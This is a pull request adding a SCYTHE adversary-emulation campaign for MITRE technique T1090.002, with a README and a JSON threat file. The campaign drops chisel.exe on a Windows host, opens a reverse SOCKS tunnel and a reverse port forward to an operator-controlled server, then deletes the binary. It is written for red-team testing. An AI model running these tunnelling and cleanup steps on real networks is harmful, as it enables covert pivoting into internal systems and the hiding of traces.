### PR TITLE
T1090.002 - External Proxy - Chisel

### DIFF
--- a/T1090.002 - External Proxy - Chisel/README.md
+++ b/T1090.002 - External Proxy - Chisel/README.md
@@ -1,0 +1,24 @@
+# T1090.002 - External Proxy - Chisel
+
+Uses the open source tool [chisel](https://github.com/jpillora/chisel) to perform reverse SOCKS proxying and reverse port forwarding. This demonstrates how an adversary can use publicly available tools to create network tunnels into a network via a compromised host (a beachhead), allowing them to pivot internally or host attacker services within the network. Via a reverse SOCKS proxy, an adversary may browse websites and access network resources internal to their target. Via a reverse port forward, they may tunnel network connections to the compromised host on to an attacker-controlled service; this may be used for a wide variety of attacks such as credential relaying.
+
+This Compound Action assumes that a chisel server is running on a server you control. This chisel server's configuration is independant of the SCYTHE server. chisel is very easy to deploy. Simply download the released executable from the GitHub repository specific to your operating system and execute it with appropriate command-line parameters (detailed below). The SCYTHE Campaign has variables for the chisel server IP, chisel server port, and the reverse port forwarding port. You may update these to match your configuration.
+
+## Import the Compound Action into SCYTHE
+1. Zip up this directory.
+2. From the SCYTHE GUI, click Threat Manager - Migrate Threats
+3. Under "Import Threat" click “Choose File” and select the ZIP
+4. Click Import and OK when complete
+
+## Attack Emulation with SCYTHE
+1. Deploy chisel on a server that you control. Provide the `server --reverse` command line parameters to the chisel executable. Ensure that all relevant firewalls allow incoming TCP traffic to port 8080 (by default). You may also specify a listening port for chisel with the `--port` parameter.
+2. If you wish to test reverse port forwarding, you may also host a service such as webserver on the chisel server. In our demonstrations, we ran the command `python3 -m http.server` to host a webserver on port 8000. Port 8000 is also the default port for reverse port forwarding that is used in this Campaign. You may change this port by modifying Step 8.
+3. Create a new SCYTHE campaign
+4. In the Automate Campaign UI, click Existing Threats and select "T1090_002 - External Proxy_chisel". Click "Add Steps".
+5. Edit Step 5 to change the IP address for the chisel server.
+6. Start the Campaign
+7. As the reverse SOCKS connection is made, you will see a log event appear in the chisel server log.
+8. The reverse port forward will NOT generate a log event on the chisel server by default. So you will need to test that it works some other way, such as by browsing to `http://localhost:8000` on the target machine where the client is running in order to view the webserver running on port 8000 on the chisel server.
+
+## References
+- https://github.com/jpillora/chisel

--- a/T1090.002 - External Proxy - Chisel/T1090_002_-_External_Proxy_chisel_scythe_threat.json
+++ b/T1090.002 - External Proxy - Chisel/T1090_002_-_External_Proxy_chisel_scythe_threat.json
@@ -1,0 +1,143 @@
+{
+    "threat": {
+        "category": "User-Defined",
+        "description": "Performs reverse SOCKS and reverse port forward tunneling via the open-source tool chisel.\n\nNOTE: Requires configuration. See readme and steps for details.",
+        "display_name": "T1090_002 - External Proxy_chisel",
+        "name": "T1090_002 - External Proxy_chisel",
+        "operating_system_name": "windows",
+        "script": {
+            "0": {
+                "conf": "--cp 127.0.0.1:443 --multipart 10240 --secure true",
+                "module": "https",
+                "type": "initialization"
+            },
+            "1": {
+                "module": "loader",
+                "module_to_load": "run",
+                "request": "--load run",
+                "type": "message"
+            },
+            "2": {
+                "module": "loader",
+                "module_to_load": "downloader",
+                "request": "--load downloader",
+                "type": "message"
+            },
+            "3": {
+                "name": "NOTE",
+                "type": "assign",
+                "value": "Chisel GitHub (with downloadable releases): https://github.com/jpillora/chisel"
+            },
+            "4": {
+                "name": "NOTE",
+                "type": "assign",
+                "value": "There must be a chisel reverse tunneling server running at the server and port specified in the next two steps. UPDATE THE SERVER IP ADDRESS.\n\nExample chisel server: ./chisel_1.7.7_linux_amd64 server --reverse"
+            },
+            "5": {
+                "name": "server",
+                "type": "assign",
+                "value": "0.0.0.0"
+            },
+            "6": {
+                "name": "SOCKS port",
+                "type": "assign",
+                "value": "8080"
+            },
+            "7": {
+                "name": "NOTE",
+                "type": "assign",
+                "value": "There must be a service listening on the chisel server on port 8000. Example: python3 http.server 8000"
+            },
+            "8": {
+                "name": "RPortForward port",
+                "type": "assign",
+                "value": "8000"
+            },
+            "9": {
+                "depends_on": "6f076e51-2e23-46c2-b88e-4505902f960e",
+                "module": "downloader",
+                "request": "--src VFS:/shared/threats/T1090002-ExternalProxy-Chisel/chisel.exe --dest %TEMP%\\chisel.exe",
+                "type": "message"
+            },
+            "10": {
+                "name": "STEP",
+                "type": "assign",
+                "value": "Reverse SOCKS"
+            },
+            "11": {
+                "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db",
+                "module": "run",
+                "request": "cmd /c start /B %TEMP%\\chisel.exe client $(5).response:$(6).response R:socks",
+                "rtags": [
+                    "att&ck-technique:T1090.002",
+                    "att&ck-technique:T1059.003",
+                    "att&ck-technique:T1059"
+                ],
+                "type": "message"
+            },
+            "12": {
+                "time": "120",
+                "type": "delay"
+            },
+            "13": {
+                "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db",
+                "module": "run",
+                "request": "taskkill /im chisel.exe /f",
+                "type": "message"
+            },
+            "14": {
+                "name": "STEP",
+                "type": "assign",
+                "value": "Reverse port forwarding"
+            },
+            "15": {
+                "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db",
+                "module": "run",
+                "request": "cmd /c start /B %TEMP%\\chisel.exe client $(5).response:$(6).response $(8).response",
+                "rtags": [
+                    "att&ck-technique:T1090.002",
+                    "att&ck-technique:T1059.003",
+                    "att&ck-technique:T1059"
+                ],
+                "type": "message"
+            },
+            "16": {
+                "time": "120",
+                "type": "delay"
+            },
+            "17": {
+                "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db",
+                "module": "run",
+                "request": "taskkill /im chisel.exe /f",
+                "type": "message"
+            },
+            "18": {
+                "name": "STEP",
+                "type": "assign",
+                "value": "Cleanup"
+            },
+            "19": {
+                "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db",
+                "module": "run",
+                "request": "cmd /c del %TEMP%\\chisel.exe",
+                "rtags": [
+                    "att&ck-technique:T1070.004"
+                ],
+                "type": "message"
+            },
+            "20": {
+                "module": "controller",
+                "request": "--shutdown",
+                "rtags": [
+                    "scythe",
+                    "att&ck",
+                    "att&ck-tactic:TA0011",
+                    "att&ck-technique:T1219"
+                ],
+                "type": "message"
+            }
+        },
+        "signature": "3ce1cbeedb097e1a0c3b83ebdd6c955a7433cf29",
+        "tags": []
+    }
+}


### PR DESCRIPTION
Added an example of reverse SOCKs proxy and reverse port forwarding via Chisel. Will update later with a version that runs in-memory and does not drop the executable to disk.